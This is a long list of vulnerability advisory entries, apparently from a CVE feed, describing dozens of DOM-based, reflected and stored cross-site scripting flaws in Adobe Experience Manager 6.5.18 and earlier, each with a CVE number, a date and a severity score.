adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48472
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48473
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48474
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48475
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48476
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48477
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48478
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48479
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48480
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48481
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48482
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48483
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48484
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48485
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48486
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48487
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48488
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48489
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48490
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48491
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48492
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48493
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48494
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48495
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48496
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48497
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48498
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48499
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48500
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48501
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48502
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48503
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48504
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48505
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48506
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48507
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48508
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48509
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48510
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48511
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48512
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48513
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48514
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48515
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48516
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48517
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48518
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48519
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48520
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48521
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48522
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48523
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48524
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48525
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48526
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48527
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48528
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48529
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48530
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48531
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48532
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48533
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48534
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48535
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48536
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48537
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48538
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48539
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48540
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48541
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48542
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48543
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48544
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48545
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48546
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48547
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48548
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48549
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48550
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48551
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48552
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48553
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48554
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48555
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48556
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48557
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48558
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48559
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48560
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48561
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48562
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48563
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48564
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48565
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48566
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48567
psirt@adobe.com
